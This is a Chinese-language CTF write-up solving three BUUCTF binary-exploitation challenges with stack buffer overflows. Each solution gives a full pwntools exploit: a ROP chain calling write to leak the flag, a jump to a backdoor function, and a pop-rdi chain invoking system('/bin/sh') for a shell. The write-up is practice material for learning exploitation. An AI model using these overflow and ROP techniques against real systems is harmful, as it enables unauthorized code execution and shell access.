buuctf刷题（2）【13题 - 】

not_the_same_3dsctf_2016

一开始看到这两个函数，直接栈溢出，跳过来不就行了，，，没注意看，get_secret，是指将flag读入了f14g，并没有打印出来呢，所以我们还需要自己打印一下

搜了一下，有write函数，那就调用它

#coding=utf-8
from pwn import *
connect = 1#连接本地
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='29206'#IP地址
main_addr = 0x080489E0
secret_addr = 0x080489A0
write_addr = 0x0806E270
fl4g = 0x080ECA2D

if connect:
    p=remote(port,ip)
else :
    p=process("./"+fileName+"")
#p.recvuntil("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ")
#跳到get_secret，先让flag读入,最后返回main
p.sendline("a"*0x2d+p32(secret_addr)+p32(main_addr))
#调用write函数读出
p.sendline("a"*0x2d+p32(write_addr)+p32(main_addr)+p32(1)+p32(fl4g)+p32(0x100))
p.interactive()  

 

 

jarvisoj_level0

一道简单的栈溢出，也给了后门函数

覆盖量为0x80，还有ebp，接下来加上后面函数的地址即可

#coding=utf-8
from pwn import *
connect = 1#连接
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='26257'#IP地址

if connect:
    p=remote(port,ip)
else :
    p=process("./"+fileName+"")

p.recvuntil("d")
p.sendline("s"*0x80+p64(0x0)+p64(0x0400596))
#p.sendline("s"*0x80+p64(0x0400596))
p.interactive()
    
    
p.interactive()   

[HarekazeCTF2019]baby_rop

emmm，又一道超级简单的水题，，，，

输入没有控制大小，可以溢出，覆盖率为0x10+0x8

程序里面有system和binsh，组合一下就可以

因为是64位的程序，用寄存器传值，所以还要找一个pop rdi；ret

然后就可以写exp了

#coding=utf-8
from pwn import *
connect = 1#连接
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='25312'#IP地址

if connect:
    p=remote(port,ip)
else :
    p=process("./"+fileName+"")
system_addr = 0x000400490
binsh_addr = 0x0601048
rdi_addr = 0x000400683 
ret_addr = 0x040061A

p.recvuntil("name?")
payload='a'*0x10+p64(0x0)#覆盖量
payload+=p64(rdi_addr)
payload+=p64(binsh_addr)#将binsh进入寄存器
payload+=p64(system_addr)#调用system函数
payload+=p64(ret_addr)#可加可不加
payload+=p64(0x04005D6)#返回地址，main，可以有可没有

p.sendline(payload)
p.interactive()